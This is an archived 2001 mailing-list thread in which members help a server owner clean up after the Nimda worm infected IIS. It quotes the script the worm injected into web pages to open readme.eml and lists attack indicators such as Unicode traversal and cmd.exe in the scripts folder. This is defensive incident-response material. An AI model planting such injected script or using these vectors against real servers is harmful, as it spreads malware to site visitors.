The UK Home Automation Archive

Archive Home
Group Home
Search Archive


Advanced Search

The UKHA-ARCHIVE IS CEASING OPERATIONS 31 DEC 2024

Latest message you have seen: Re: Re[2]: [OT] PDA GPS Blah Blah Blah


[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: IIS Worm



I am new to this IIS thing so any help would be appreciated.  I am on a LAN
and am serving via IIS.  I know I was not affected by Nimda but would like
to know if an attempt was made to infect me.  I remember there is a log for
these types of things but I can't remember for the life of me where it is.
I am running Win2k Pro.

Cheers

Pedro de Oliveira


-----Original Message-----
From: Graham Howe [mailto:graham@xxxxxxx]
Sent: 19 September 2001 01:51
To: ukha_d@xxxxxxx
Subject: RE: [ukha_d] IIS Worm


See my comments below:

> Hard to say really given the lack of information on it... first thing
> I suggest is close the IIS down if you have not already since you will
> currently be unwittingly attacking neighbouring IP ranges.
> (You will make at
> least 16 attacks)
>
I have stopped all web sites on the server, do i need to disable the actual
IIS service too? If so then where is the best place to do this (I am not an
NT4 server expert).

> The next stage will be for the moment the hard one. Finding out what
> was done to your system. If it follows Code Red as closely as current
> suggestions are then you will find multiple version of
> index.htm(l) and
> default.htm(l) in all web directories and some system
> directories. These
> files will contain any new "content" and as such should be
immdeiately
> destroyed.
>
It appears to be much worse than this, I have over 4500 files that have
been
altered today and they appear to include every page in every site on the
server (even the example stuff included in the initial installation).
Looking at the pages they all have the following added to the end of the
page:

<html><script
language="JavaScript">window.open("readme.eml",
null,
"resizable=no,top=6000,left=6000")</script></html>

which obviously causes problems for those visiting my sites.

> Assuming you have logging turned on for W3SRV then this might not be
> too difficult to track. The log will tell you everything that was
> done through
> IIS. It will also show you the successful loophole in your system that
> allowed it to happen. (see later)
>
I have not check the log as I could see all this already.

> A simple and effective although possibly time consuming excercise is
> to use the simple Find Files mechanism of Windows on your entire
> drive. You should
> be able to get a potential time from the W3SRV log files or
> at least between
> when you knew you were OK and when you discovered the breach.
> Any files in
> this timeframe should be examined for potential corruption.
>
As above there are over 4500 of them.

> If you find cmd.exe or similar in the IISSCRIPTS directory usally
> after a Code Red type attack, but check the whole InetPub tree,
> delete this file.
>
No sign of this, but I had installed the code red patch so I am not
surprised.

> Use Find files again to serach for *.eml. This is what you web server
> has been instructed to download and parse in order to install the
> worm. If the
> file isn't known to be yours, delete it without opening it or at worst
> archive to floppy and check on another machine not running IIS4/5.
>
Loads of these, all now deleted. However they come back following a reboot
so I obviously still have the worm on my system.

> Do a find *in* files looking for "readme.eml". This is the
rogue file
> your server will attempt to distribute. Remove or fix any files
> containing a
> reference to it.
>
Big problem is the number affected, I don't know of a way to change that
many files.

> Before resuming IIS service in any way, you need to ensure that you
> are secure.
>
Looks like I will be out of action for a while.

> Disable script access to all directories across the board except where
> specifically needed and ensure that the scripts can only access known
> resources as INETUSER. One attempt, although largely unsuccessful, to
> access an IIS machine is using the scripts supplied in the default
> installation.
>

Please give idiot proof instructions on this, I am not sure of the best way
of sorting out script access and resources.

> Use Windows Update or your preferred mechanism to install all know
> updates particularly service
> packs and security updates.
>
I thought I had! Code Red was done but not Code Blue, I am now using
hfnetchk to see that all patches are there, is this best solution?

> Look at:
>
> http://www.microsoft.com/technet/treeview/default.asp?url=/tec
> hnet/security/
> bulletin/ms00-078.asp
>
This one was missing, it is in place now.

> and similar articles.
>
> If you need external access for configuration use IP based access to
> protect against password cracking attempts. If you do not, disable the
> remote administration interface for IIS if it is enabled and remove
> the default
> installation of files in the INETPUB directory or set IIS to use a non
> standard root which will do effectively the same thing but
> preserves the
> original files for your reference if you want them.
>
I don't need remote admin, so should I simply stop the admin site within
IIS

> Ensure authoring permissions etc are set to maximum security and
> anything that seems slightly suspicious is set to use challenge
> response authentication only.
>
I tend to do everything through Frontpage publishing and SQL Server
Enterprise Manager. Both require passwords for access, but I am not sure
how
secure they are. Again are there any idiot guides as to what I should set
up?

> The following are known attacks of this virus. After you have
> installed the malformed URL fix, you will be immune to all, however,
> these items in your
> logs will indicate files you need to serach for and where appropriate
> destroy:
>
All these files are not present or else seem fine (old dates)

> get_mem_bin
> vti_bin owssvr.dll
> Root.exe
> CMD.EXE
> ../ (Unicode)
> Getadmin.dll
> Default.IDA
> /Msoffice/ cltreq.asp
>
>
> Also look out for readme.exe and admin.dll (56K) with a 'audio xwave'
> mime type which were the original propogation.
>
These have been removed.


> HTH.
>
It has but more help would still be welcome.

> Mark.
>
Graham


For more information: http://www.automatedhome.co.uk
Post message: ukha_d@xxxxxxx
Subscribe:  ukha_d-subscribe@xxxxxxx
Unsubscribe:  ukha_d-unsubscribe@xxxxxxx
List owner:  ukha_d-owner@xxxxxxx

Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/




Home | Main Index | Thread Index

Comments to the Webmaster are always welcomed, please use this contact form . Note that as this site is a mailing list archive, the Webmaster has no control over the contents of the messages. Comments about message content should be directed to the relevant mailing list.